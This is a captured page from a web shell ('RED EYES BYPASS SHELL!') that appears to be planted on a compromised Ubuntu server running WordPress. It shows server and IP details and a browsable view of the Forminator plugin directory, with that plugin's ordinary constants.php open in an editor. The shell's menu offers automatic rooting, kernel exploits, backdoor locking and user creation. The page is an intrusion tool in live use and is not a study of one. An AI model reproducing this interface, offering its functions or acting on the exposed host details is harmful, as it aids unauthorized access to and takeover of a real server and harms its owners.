Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
plugins /
forminator /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
addons
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
library
[ DIR ]
drwxr-xr-x
requirejs
[ DIR ]
drwxr-xr-x
samples
[ DIR ]
drwxr-xr-x
constants.php
996
B
-rwxr-xr-x
forminator.php
16.82
KB
-rwxr-xr-x
functions.php
2.44
KB
-rwxr-xr-x
readme.txt
130.32
KB
-rwxr-xr-x
uninstall.php
5.31
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : constants.php
<?php /** * The plugin constants. * * @package Forminator * @subpackage Constants */ /** * Internal constants, not to be overridden */ if ( ! defined( 'FORMINATOR_VERSION' ) ) { define( 'FORMINATOR_VERSION', '1.49.0' ); } if ( ! defined( 'FORMINATOR_SUI_VERSION' ) ) { define( 'FORMINATOR_SUI_VERSION', '2.12.23' ); } if ( ! defined( 'FORMINATOR_STRIPE_LIB_VERSION' ) ) { define( 'FORMINATOR_STRIPE_LIB_VERSION', '17.4.0' ); } if ( ! defined( 'FORMINATOR_STRIPE_LIB_DATE' ) ) { define( 'FORMINATOR_STRIPE_LIB_DATE', '2024-04-10' ); } if ( ! defined( 'FORMINATOR_STRIPE_PARTNER_ID' ) ) { define( 'FORMINATOR_STRIPE_PARTNER_ID', 'pp_partner_GeDaq2odDgGkDJ' ); } if ( ! defined( 'FORMINATOR_PAYPAL_LIB_VERSION' ) ) { define( 'FORMINATOR_PAYPAL_LIB_VERSION', '1.14.0' ); } if ( ! defined( 'FORMINATOR_PRO' ) ) { define( 'FORMINATOR_PRO', false ); } if ( ! defined( 'FORMINATOR_PRO_URL' ) ) { define( 'FORMINATOR_PRO_URL', 'https://wpmudev.com/project/forminator-pro/' ); }
Close